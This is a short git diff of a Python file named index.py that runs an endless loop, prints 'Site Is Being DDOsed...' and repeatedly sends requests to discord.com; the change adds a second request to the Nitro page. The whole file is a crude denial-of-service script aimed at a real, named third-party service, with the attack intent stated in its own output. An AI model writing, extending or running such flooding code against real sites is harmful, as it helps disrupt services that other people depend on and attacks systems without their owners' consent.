diff --git a/index.py b/index.py index ad4068b..02298d7 100644 --- a/index.py +++ b/index.py @@ -2,4 +2,5 @@ import requests while True: # Your code here print("Site Is Being DDOsed...") - requests.get("https://discord.com") \ No newline at end of file + requests.get("https://discord.com") + requests.get("https://discord.com/nitro") \ No newline at end of file